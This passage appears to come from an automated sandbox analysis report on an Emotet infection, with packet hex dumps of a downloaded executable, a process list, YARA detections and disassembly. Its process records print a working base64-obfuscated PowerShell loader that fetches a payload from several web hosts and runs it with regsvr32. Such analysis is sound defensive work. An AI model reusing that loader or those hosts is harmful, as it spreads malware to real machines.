                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@
                                                                                                                                          May 23, 2022 04:12:15.349541903 CEST1132INData Raw: 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: B
                                                                                                                                          May 23, 2022 04:12:15.349581003 CEST1133INData Raw: c4 72 6b 45 40 c7 45 c8 67 bf 2f 7b c7 45 cc 6d 62 50 76 c7 45 d0 98 20 2b 59 c7 45 d4 3c 09 64 ac c7 45 d8 e2 4d 20 7a c7 45 dc 24 06 55 0e c7 45 e0 4e ae 85 62 c7 45 e4 30 6b 6a 2e c7 45 e8 8f 78 69 79 c7 45 ec 3a 09 21 40 c7 45 f0 98 3d 4d 14
                                                                                                                                          Data Ascii: rkE@Eg/{EmbPvE +YE<dEM zE$UENbE0kj.ExiyE:!@E=MEBXE6E;#tEIE<*1E#\VE"uEAwEYPE"wEV!E .aE$"a/E(:S9E,TE0<E4mE8_oE<2E@FED;EH7EL-
                                                                                                                                          May 23, 2022 04:12:15.349620104 CEST1134INData Raw: 85 14 02 00 00 a4 07 46 6c c7 85 18 02 00 00 3a 30 04 53 c7 85 1c 02 00 00 f2 78 41 38 c7 85 20 02 00 00 39 02 16 4e c7 85 24 02 00 00 bd 60 71 59 c7 85 28 02 00 00 1e 59 0b 65 c7 85 2c 02 00 00 0a b9 17 4e c7 85 30 02 00 00 3a 8f 79 e5 c7 85 34
                                                                                                                                          Data Ascii: Fl:0SxA8 9N$`qY(Ye,N0:y4b%8<>N@o;ED(7Hp PL5P6CT& X2{\ePO`/CdTG0h}WLltuOp:Yt
                                                                                                                                          May 23, 2022 04:12:15.349659920 CEST1136INData Raw: e0 c7 85 2c 04 00 00 5e 60 de e9 c7 85 30 04 00 00 23 28 a7 8b c7 85 34 04 00 00 1f 35 ee b8 c7 85 38 04 00 00 2b 4f b7 5c c7 85 3c 04 00 00 70 75 b6 ab c7 85 40 04 00 00 26 5c 68 52 c7 85 44 04 00 00 8b 5f 6c b5 c7 85 48 04 00 00 62 eb 89 02 c7
                                                                                                                                          Data Ascii: ,^`0#(458+O\<pu@&\hRD_lHbL+qP>TjfXX\Cb`42dq?h4%llpsoKt#xi|>l|%c$mH
                                                                                                                                          May 23, 2022 04:12:15.349700928 CEST1137INData Raw: 80 7d 42 c7 85 44 06 00 00 21 77 55 92 c7 85 48 06 00 00 65 d4 b4 28 c7 85 4c 06 00 00 73 9a 42 99 c7 85 50 06 00 00 d7 2b 4b 2a c7 85 54 06 00 00 de a5 2e 6c c7 85 58 06 00 00 35 81 b2 06 c7 85 5c 06 00 00 a3 eb a0 9b c7 85 60 06 00 00 db 54 67
                                                                                                                                          Data Ascii: }BD!wUHe(LsBP+K*T.lX5\`Tg9doEhulCepd$t"aVx#d|?N3]='O5[(;.,:'U@et%</LI
                                                                                                                                          May 23, 2022 04:12:15.349741936 CEST1138INData Raw: 00 46 4c 49 6e c7 85 5c 08 00 00 5f 24 bd 63 c7 85 60 08 00 00 b1 d1 43 35 c7 85 64 08 00 00 71 e1 68 d3 c7 85 68 08 00 00 94 b3 8d 66 c7 85 6c 08 00 00 e1 a2 02 41 c7 85 70 08 00 00 e0 b7 b7 78 c7 85 74 08 00 00 f6 dc 23 24 c7 85 78 08 00 00 47
                                                                                                                                          Data Ascii: FLIn\_$c`C5dqhhflApxt#$xGz|Q[nsmKa?<J(+y@p3zmm7jue75@
                                                                                                                                          May 23, 2022 04:12:15.349781036 CEST1140INData Raw: 0a 00 00 48 36 64 a0 c7 85 74 0a 00 00 ea 18 bc 62 c7 85 78 0a 00 00 41 9b 1e e8 c7 85 7c 0a 00 00 33 26 07 a3 c7 85 80 0a 00 00 10 66 98 a4 48 8d 0d 21 f5 01 00 c7 85 84 0a 00 00 60 41 6e 4d c7 85 88 0a 00 00 4b ba c2 33 c7 85 8c 0a 00 00 ff b1
                                                                                                                                          Data Ascii: H6dtbxA|3&fH!`AnMK3*l?xuOKx(7&).Rtp9:|e:NKf3HuHBE3E3F
                                                                                                                                          May 23, 2022 04:12:15.349821091 CEST1141INData Raw: 0f c3 51 d8 48 0f c3 51 e0 49 ff c9 48 0f c3 51 e8 48 0f c3 51 f0 48 0f c3 51 f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad 00 00 00 e8 9e 54 00 00 85 c0 75
                                                                                                                                          Data Ascii: QHQIHQHQHQu$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk
                                                                                                                                          May 23, 2022 04:12:15.349860907 CEST1143INData Raw: 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48 89 44 24 40 48 8b 84 24 c8 00 00
                                                                                                                                          Data Ascii: +HD$hH$H@8H$H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H
                                                                                                                                          May 23, 2022 04:12:15.477739096 CEST1144INData Raw: ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc cc cc 48 89 54 24 10 48 89 4c 24
                                                                                                                                          Data Ascii: HHH(=%rtrrRH(HT$HL$H(HD$0HHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:04:11:44
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                                                                                                                                          Imagebase:0xc20000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:04:11:45
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:04:11:45
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                                                                                                                          Imagebase:0xa60000
                                                                                                                                          File size:430592 bytes
                                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:04:12:03
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:04:12:07
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:04:12:08
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:04:12:08
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:04:12:09
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:04:12:10
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                          Imagebase:0x7ff700940000
                                                                                                                                          File size:163336 bytes
                                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:04:12:10
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:04:12:15
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:04:12:16
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                                                                                                                          Imagebase:0x1280000
                                                                                                                                          File size:20992 bytes
                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:04:12:17
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline: C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                                                                                                                          Imagebase:0x7ff75d180000
                                                                                                                                          File size:24064 bytes
                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:04:12:21
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                                                                                                                                          Imagebase:0x7ff75d180000
                                                                                                                                          File size:24064 bytes
                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:04:12:21
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:04:12:22
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:04:12:34
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:04:12:45
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:29
                                                                                                                                          Start time:04:13:07
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                          Imagebase:0x7ff73c930000
                                                                                                                                          File size:51288 bytes
                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:30
                                                                                                                                          Start time:04:13:11
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                          Imagebase:0x7ff7b0320000
                                                                                                                                          File size:455656 bytes
                                                                                                                                          MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Target ID:31
                                                                                                                                          Start time:04:13:11
                                                                                                                                          Start date:23/05/2022
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:3.4%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:3
                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                            execution_graph 15860 4db60e9 15861 4db60ef GetFileAttributesW 15860->15861 15863 4db616f 15861->15863

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 874 4db3f88-4db3f8a 875 4db3f8c 874->875 876 4db3f90-4db3f97 874->876 875->876 877 4db3f99-4db613a 876->877 878 4db3f9d-4db3fb2 876->878 885 4db613c-4db613f 877->885 886 4db6142-4db616d GetFileAttributesW 877->886 881 4db3fb8-4db3fe0 878->881 882 4db3fb4 878->882 884 4db3fe6-4db4034 881->884 882->881 895 4db4036-4db40b8 884->895 885->886 888 4db616f-4db6175 886->888 889 4db6176-4db6193 886->889 888->889
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04DB6160
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.319946955.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4db0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: da4893cc0265c7268f6f7e2f5e9ed140b2805cfccad49e83c0740e6ccd342ceb
                                                                                                                                            • Instruction ID: 28b18ecd5079aa21c57e0f44b9b780fb4d049776bfec5ac21d9eb64a225fb789
                                                                                                                                            • Opcode Fuzzy Hash: da4893cc0265c7268f6f7e2f5e9ed140b2805cfccad49e83c0740e6ccd342ceb
                                                                                                                                            • Instruction Fuzzy Hash: B4319EB2D0428ACFCB11CFA9C4486CABFB4FF49260F05815ED456AB711E7B4A905CB92
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 906 4db60e9-4db613a 910 4db613c-4db613f 906->910 911 4db6142-4db616d GetFileAttributesW 906->911 910->911 912 4db616f-4db6175 911->912 913 4db6176-4db6193 911->913 912->913
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04DB6160
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.319946955.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4db0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 35f60215b6a4560b0485f4fb1368cc327a6079db55505bb60745598986b97c80
                                                                                                                                            • Instruction ID: b5e647bf443d8c9df6ae22264e15957a73082996998535fbbf4a4daadc624c00
                                                                                                                                            • Opcode Fuzzy Hash: 35f60215b6a4560b0485f4fb1368cc327a6079db55505bb60745598986b97c80
                                                                                                                                            • Instruction Fuzzy Hash: 1D11F2B1D046199BCB20CFAAD8446DEFBF4BB48724F00812AD859A7700D774AA44CFE2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 897 4db3f94-4db613a 900 4db613c-4db613f 897->900 901 4db6142-4db616d GetFileAttributesW 897->901 900->901 902 4db616f-4db6175 901->902 903 4db6176-4db6193 901->903 902->903
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04DB6160
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.319946955.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4db0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 56c1371ee529ac2ad370177e561b47421af13113cd611dcf8256883d45cfe8e5
                                                                                                                                            • Instruction ID: 4982e0fad6c9cb9266211d9488dbf12e2f39166eb04c26998cef044c733810a3
                                                                                                                                            • Opcode Fuzzy Hash: 56c1371ee529ac2ad370177e561b47421af13113cd611dcf8256883d45cfe8e5
                                                                                                                                            • Instruction Fuzzy Hash: E621EFB1D046199BDB20CFAAD8447DEBBF4BB48614F00812AE959A7700D774A944CFE6
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.319307293.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_30dd000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6931542b0dcf8dd6ffd1c3d4259a48e7047ee0ab687b6e0c16d1357a6df27e19
                                                                                                                                            • Instruction ID: 801010cff6870133a9f17065e2f883156219bfae4284d5f38e945554cf1c937d
                                                                                                                                            • Opcode Fuzzy Hash: 6931542b0dcf8dd6ffd1c3d4259a48e7047ee0ab687b6e0c16d1357a6df27e19
                                                                                                                                            • Instruction Fuzzy Hash: 7901F27040A340ABE720CE25ECC4BA7FFDCEF81228F08C55AED055B282C3799845CAB1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.319307293.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_30dd000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
